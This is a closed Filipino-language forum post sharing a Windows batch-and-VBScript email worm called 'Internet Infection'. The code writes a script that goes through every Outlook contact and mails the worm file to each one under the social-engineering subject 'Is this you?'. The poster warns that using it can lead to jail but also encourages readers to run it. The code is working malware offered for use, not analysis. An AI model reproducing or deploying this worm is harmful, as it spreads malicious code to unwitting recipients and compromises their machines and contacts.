What's new

Closed Kung gusto niyo pong makulong gawin niyo po to ^_^ ‍‍ "internet infection"

Status
Not open for further replies.
Joined
Apr 24, 2017
Posts
38
Reaction
69
Points
118
Kung Gusto niyo pong makulong gawin niyo po to ^_^
‍‍
"Internet Infection"
‍‍
Kung maaari ay HUWAG ninyong gawin ito kasi pwede kayong makulong kapag nahuli kayo. Pero kung ako sainyo gawin niyo po ito 3:) Tandaan, ang code nito ay ipapadala nya ang entire virus file nya sa LAHAT ng computers contacts in Microsoft Outlook as an e-mail attachment. Inuulit ko DELIKADO talaga ito, at delikad rin ang lagay ninyo.
DO THIS AT YOUR OWN RISK!
‍‍
Code:
@ echo off
rem ---------------------------------
rem Spread Via Outlook Contact Book
echo dim x>>%SystemDrive%\mail.vbs
echo on error resume next>>%SystemDrive%\mail.vbs
echo Set fso ="Scripting.FileSystem.Object">>%SystemDrive%\mail.vbs
echo Set so=CreateObject(fso)>>%SystemDrive%\mail.vbs
echo Set ol=CreateObject("Outlook.Application")>>%SystemDrive%\mail.vbs
echo Set out=WScript.CreateObject("Outlook.Application")>>%SystemDrive%\mail.vbs
echo Set mapi = out.GetNameSpace("MAPI")>>%SystemDrive%\mail.vbs
echo Set a = mapi.AddressLists(1)>>%SystemDrive%\mail.vbs
echo Set ae=a.AddressEntries>>%SystemDrive%\mail.vbs
echo For x=1 To ae.Count>>%SystemDrive%\mail.vbs
echo Set ci=ol.CreateItem(0)>>%SystemDrive%\mail.vbs
echo Set Mail=ci>>%SystemDrive%\mail.vbs
echo Mail.to=ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(x)>>%SystemDrive%\mail.vbs
echo Mail.Subject="Is this you?">>%SystemDrive%\mail.vbs
echo Mail.Body="Man that has got to be embarrassing!">>%SystemDrive%\mail.vbs
echo Mail.Attachments.Add(%0)>>%SystemDrive%\mail.vbs
echo Mail.send>>%SystemDrive%\mail.vbs
echo Next>>%SystemDrive%\mail.vbs
echo ol.Quit>>%SystemDrive%\mail.vbs
start "" "%SystemDrive%\mail.vbs"
rem ---------------------------------
‍‍
And THE will not be held responsible for any
damage for this madapaacking trick can cause and cost.
‍‍


-ooonemilliooon
 
Status
Not open for further replies.
Back
Top